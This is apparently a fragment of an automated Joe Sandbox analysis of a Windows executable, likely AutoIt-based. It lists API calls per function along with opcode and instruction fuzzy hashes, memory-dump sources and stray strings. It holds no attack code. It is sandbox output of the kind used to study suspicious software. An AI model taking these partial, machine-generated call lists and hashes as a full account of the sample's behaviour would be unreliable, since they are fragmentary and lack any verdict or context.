                                                                                                                                                                              • Opcode ID: 6c714c7fa761042bc534f3883846e9dd2c1b5ec8583c18d2ab1c48b2abf87b34
                                                                                                                                                                              • Instruction ID: 8e544329d6002e1df66601336b7fe9606a518ad35fab4d1356e39af2fb143a84
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c714c7fa761042bc534f3883846e9dd2c1b5ec8583c18d2ab1c48b2abf87b34
                                                                                                                                                                              • Instruction Fuzzy Hash: FD2181353002119FDB00AF69DC89B6E77B9EF84724F04441DF9169B3D2DA74AC05D761
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: dEV
                                                                                                                                                                              • API String ID: 0-3214538095
                                                                                                                                                                              • Opcode ID: 6bc89c68872a3e0a90b7457c6a821146edbb706972223294082b3d8ac27ec938
                                                                                                                                                                              • Instruction ID: 5ebbed624243d763ebd0dc42492f266a65792927744d822573edd6655716f44f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bc89c68872a3e0a90b7457c6a821146edbb706972223294082b3d8ac27ec938
                                                                                                                                                                              • Instruction Fuzzy Hash: B1F17A716083019FD720DF24C985B5EBBE5FF88314F14892EF9998B292D774E945CB82
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                                                                                                                                                • Part of subcall function 004B3B1E: _wcsncpy.LIBCMT ref: 004B3B32
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                                                              • String ID: 1<K
                                                                                                                                                                              • API String ID: 3981382179-1209382738
                                                                                                                                                                              • Opcode ID: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                                                                                                                                              • Instruction ID: 5f8de176e659bb12bbc1c2185ec26dc1cc51a1932b5c9bf298b0dea110f5039b
                                                                                                                                                                              • Opcode Fuzzy Hash: 23ca5b2428c4a13f6c40432c37653c37463e81409bf642f5d34f830c9e76d3ce
                                                                                                                                                                              • Instruction Fuzzy Hash: FA21AF32B00114ABCB10DF96DC84DEEBBBDEF88701B104099F509DB245DB70AE46CBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004CC948,SwapMouseButtons,00000004,?), ref: 004CC979
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC99A
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,004CC948,SwapMouseButtons,00000004,?,?,?,?,004CBF22), ref: 004CC9BC
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                              • Opcode ID: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                                                                                                                                              • Instruction ID: e7bea402613a1a70af3018bb16fa1e1442938389c9841114ee7ef32e9254c565
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfff319a6176129b6c33ce23709c825cd6a54dc57dea133cb3c740e17c445d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 29117CB9511208BFDB608F64DC84EAF7BB8EF14740F00441AE849E7210E231AE55AB64
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                                                                                                                                              • Instruction ID: 495c99ba5fcb5b9d94ef0d9928b9794def037eab0a9cab807f96e3db150e5d00
                                                                                                                                                                              • Opcode Fuzzy Hash: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                                                                                                                                              • Instruction Fuzzy Hash: 18C1AD74A0025AEFCB14CFA5C884EAEB7B5FF48305F10859AE901AB251D734FE51CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                                • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              • _free.LIBCMT ref: 004FCDC9
                                                                                                                                                                              • _free.LIBCMT ref: 004FCDD0
                                                                                                                                                                              • _free.LIBCMT ref: 004FCE3B
                                                                                                                                                                                • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                                                                                                                                                • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                                                                                                                                              • _free.LIBCMT ref: 004FCE43
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1552873950-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004B1E87
                                                                                                                                                                                • Part of subcall function 004B38E4: _memset.LIBCMT ref: 004B3965
                                                                                                                                                                                • Part of subcall function 004B38E4: _wcscpy.LIBCMT ref: 004B39B5
                                                                                                                                                                                • Part of subcall function 004B38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004B39C6
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 004B1EDC
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B1EEB
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00524526
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378193009-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                                • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                              • gethostbyname.WS2_32(?,?,?), ref: 005092F0
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005092FB
                                                                                                                                                                              • _memmove.LIBCMT ref: 00509328
                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00509333
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1504782959-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 00523CF1
                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?,?,00000001,005722E8), ref: 00523D35
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetMalloc.SHELL32(1<K), ref: 004B3A7D
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetDesktopFolder.SHELL32(?), ref: 004B3A8F
                                                                                                                                                                                • Part of subcall function 004B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 004B3AD2
                                                                                                                                                                                • Part of subcall function 004B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,005722E8,?), ref: 004B3B65
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                              • String ID: X
                                                                                                                                                                              • API String ID: 3714316930-3081909835
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,004BC00E,?,?,?,?,00000010), ref: 004BC627
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 004BC65F
                                                                                                                                                                              • _memmove.LIBCMT ref: 004BC697
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E79
                                                                                                                                                                                • Part of subcall function 004D8E52: __NMSG_WRITE.LIBCMT ref: 004D8E83
                                                                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D8EB2: GetModuleFileNameW.KERNEL32(00000000,00570312,00000104,?,00000001,004D0127), ref: 004D8F44
                                                                                                                                                                                • Part of subcall function 004D8EB2: ___crtMessageBoxW.LIBCMT ref: 004D8FF2
                                                                                                                                                                                • Part of subcall function 004D1D65: ___crtCorExitProcess.LIBCMT ref: 004D1D6B
                                                                                                                                                                                • Part of subcall function 004D1D65: ExitProcess.KERNEL32 ref: 004D1D74
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1372826849-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 004BE646
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 004BE651
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE664
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4217535847-0
                                                                                                                                                                              • Opcode ID: f75f9967de2e64d43f9a0f433d92cc143ed2c0ace83273e8e8c70dd02ad7e0fa
                                                                                                                                                                              • Instruction ID: 5bf689c263bd7a53104595fbe800045b1c36bbf321e1aa8deff2b1be555e98b4
                                                                                                                                                                              • Opcode Fuzzy Hash: f75f9967de2e64d43f9a0f433d92cc143ed2c0ace83273e8e8c70dd02ad7e0fa
                                                                                                                                                                              • Instruction Fuzzy Hash: 14F05E3260434997DB10D6E69C46FEBB7EDBF94740F54082EB645C2180E7B8D4049726
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 004FC45E
                                                                                                                                                                                • Part of subcall function 004D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28DE
                                                                                                                                                                                • Part of subcall function 004D28CA: GetLastError.KERNEL32(00000000,?,004D8715,00000000,004D88A3,004D4673,?), ref: 004D28F0
                                                                                                                                                                              • _free.LIBCMT ref: 004FC46F
                                                                                                                                                                              • _free.LIBCMT ref: 004FC481
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                              • Instruction ID: f022a94627a0574eabaaa930a509d208650d51a10b4d1ef6fb59618d6dde1429
                                                                                                                                                                              • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                                                                              • Instruction Fuzzy Hash: 84E0C2A160070482CA20B97A6AA0BB353CC2F04310B04096FF549D3382CF5CE840A03C
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CALL
                                                                                                                                                                              • API String ID: 0-4196123274
                                                                                                                                                                              • Opcode ID: 0026fa494153c77eb388212de051a657db6aed34ac60258221560b57b967a371
                                                                                                                                                                              • Instruction ID: 979289cf3b294ef4ec807552f4fdf7a3a2dd4c17ee7bdf5ea50e98a7580ed943
                                                                                                                                                                              • Opcode Fuzzy Hash: 0026fa494153c77eb388212de051a657db6aed34ac60258221560b57b967a371
                                                                                                                                                                              • Instruction Fuzzy Hash: 9C229C78608341CFD764DF15C490F2ABBE1BF85304F14896EE89A8B362D739E885CB46
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,004B14EB), ref: 004B1751
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004B159B
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 004B1612
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005258F7
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3815369404-0
                                                                                                                                                                              • Opcode ID: 390963825129f3a324b003f28e359cdb4fde1595a4aef9a82e9febe77a3e86ae
                                                                                                                                                                              • Instruction ID: 4171bfb248d227c5a931d4a50c54fa6632f26a655904c68062bbefce34b9e5a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 390963825129f3a324b003f28e359cdb4fde1595a4aef9a82e9febe77a3e86ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 2071EDB4811A408BCB18DF6EB996494BBEAF768348794416ED40E87362DB74448CFF2D
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: EA06
                                                                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                                                                              • Opcode ID: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                                                                                                                                              • Instruction ID: 9b6afbe66828c7d41ce9c01d634270eae67b314b1cb82fb27023465c481a9f98
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e9adad7c6e9f90e06c1c85b1d727b1d714ad421438514e47ea7af884c08d50a
                                                                                                                                                                              • Instruction Fuzzy Hash: 23419E21E0411497DB11AB6888957FF7F62DFD5304F18456BEA82DB283C6398DC187BA
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 856254489-3771769585
                                                                                                                                                                              • Opcode ID: 150c986f50d1a6c943ff15e37fbfd822fddfde7b0a686d130a8cc75144286113
                                                                                                                                                                              • Instruction ID: e5fa12a1462eb7a86ac406a9d3aaaba68ddb0a18c0427d3321cbf45b82cd1ca6
                                                                                                                                                                              • Opcode Fuzzy Hash: 150c986f50d1a6c943ff15e37fbfd822fddfde7b0a686d130a8cc75144286113
                                                                                                                                                                              • Instruction Fuzzy Hash: BC118F35600204DBCB04EB55C9D1EADB7A9BF88718F14805EF605AF3D1DA74EE42CBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: "W
                                                                                                                                                                              • API String ID: 4104443479-3062634219
                                                                                                                                                                              • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                              • Instruction ID: 3eedd2f3568363316124f9c40c3bba42633d0a6b269ab2ce3b554b057822d21e
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                              • Instruction Fuzzy Hash: 0301D136200225ABCB249F2EC8919BB77A9EFC5318714802FF90ACB305D636E906C790
                                                                                                                                                                              Strings
                                                                                                                                                                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005234AA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                              • API String ID: 1029625771-2684727018
                                                                                                                                                                              • Opcode ID: 83f74ad1907b0dfa9fb2908eb6a6513ff133d6cbd60fc3d8d71e62c0562c2c61
                                                                                                                                                                              • Instruction ID: c8a99aaa030bf87cb2cdeed0fa13ac3d7e6bcf0d2416237564fcb90232405ac9
                                                                                                                                                                              • Opcode Fuzzy Hash: 83f74ad1907b0dfa9fb2908eb6a6513ff133d6cbd60fc3d8d71e62c0562c2c61
                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0447190021DAA9F11FEA2D9918FFB778BE10308B10856BE81592181EB38DB09DB75
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,004F685E,?,?,?,00524A5C,0054E448,00000003,?,?), ref: 004F66E2
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,"W,00000000,00000000,?,?,?,00524A5C,0054E448,00000003,?,?,004B4C44,?,?), ref: 004F686C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$PointerWrite
                                                                                                                                                                              • String ID: "W
                                                                                                                                                                              • API String ID: 539440098-3062634219
                                                                                                                                                                              • Opcode ID: a7f3a0ce2301733d287e901eb8c550a673ce7e07c52929fc54a244e1c6c4ee72
                                                                                                                                                                              • Instruction ID: abebb5deac6055bb8c2f15f0c936b08867252f837b421131d1347d02479ec9ec
                                                                                                                                                                              • Opcode Fuzzy Hash: a7f3a0ce2301733d287e901eb8c550a673ce7e07c52929fc54a244e1c6c4ee72
                                                                                                                                                                              • Instruction Fuzzy Hash: 99E0B636400218BBDB20AF94E805A9ABBB9EB04354F10455AF94195151D7B5AA14DBA4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5ca553f360d291f1fb296d4b9c59d5bb64d886abf53d8e384ab9945129620d09
                                                                                                                                                                              • Instruction ID: 45a4e8977eb46c4f5bc00c377abdbcc8b98326da1801126794a19e4797f05f73
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ca553f360d291f1fb296d4b9c59d5bb64d886abf53d8e384ab9945129620d09
                                                                                                                                                                              • Instruction Fuzzy Hash: D651C1352043019FCB14EF25D491BAA77E5BF89314F14856EF9568B2D2CB38E809CB6A
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00508074
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0050807A
                                                                                                                                                                                • Part of subcall function 00506B19: GetWindowRect.USER32(?,?), ref: 00506B2C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CursorForegroundRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1066937146-0
                                                                                                                                                                              • Opcode ID: 71003e5941d607f4631c9d7d8f5e71427102684bf917280bc98361b674571713
                                                                                                                                                                              • Instruction ID: 66b498a50c05f33b4799977fb8af114c25bb5713c97dbd550bef131813575d69
                                                                                                                                                                              • Opcode Fuzzy Hash: 71003e5941d607f4631c9d7d8f5e71427102684bf917280bc98361b674571713
                                                                                                                                                                              • Instruction Fuzzy Hash: 25311B75900208AFDB00EFA5CD81BEEB7B8FF14314F10442EE945A7251DB78AE55CB64
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0052DB31
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0052DB6B
                                                                                                                                                                                • Part of subcall function 004B1F04: GetForegroundWindow.USER32 ref: 004B1FBE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Foreground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 62970417-0
                                                                                                                                                                              • Opcode ID: 3bbaf4ea2bd4c9afd065ecf1dacfae6e69b520785633781ad2c4c8f1008c20fe
                                                                                                                                                                              • Instruction ID: c2f8fe88e29195fd7243b942c92b065c62da93bf1b095b40ca11aa862c0de06b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3bbaf4ea2bd4c9afd065ecf1dacfae6e69b520785633781ad2c4c8f1008c20fe
                                                                                                                                                                              • Instruction Fuzzy Hash: C621D272600206ABDB14AB35C8A1BFE77BDAF41388F00042EF95A87191DB78ED05D774
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004EE344
                                                                                                                                                                              • _strlen.LIBCMT ref: 004EE34F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout_strlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2777139624-0
                                                                                                                                                                              • Opcode ID: 741191d89bbe8164add2fe97a6b2dc2c7d3fc5bc37f9aa7e84b8ed35414e5bcb
                                                                                                                                                                              • Instruction ID: 08dd2898c73a937727cc06f257d9109110d13e8eba5731b8ffa6c319ad0174a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 741191d89bbe8164add2fe97a6b2dc2c7d3fc5bc37f9aa7e84b8ed35414e5bcb
                                                                                                                                                                              • Instruction Fuzzy Hash: 9111A73120020467CB04BB6BDCD6DFF7BA99F45345F00443FFA069B292DE69984696AC
                                                                                                                                                                              APIs
